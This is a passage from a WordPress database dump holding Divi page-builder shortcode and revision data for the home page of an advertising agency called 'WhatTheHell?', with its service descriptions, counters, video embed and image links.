button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-04 18:44:49','2020-08-04 18:44:49','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/134-revision-v1/',0,'revision','',0),(387,1,'2020-08-04 18:45:10','2020-08-04 18:45:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" 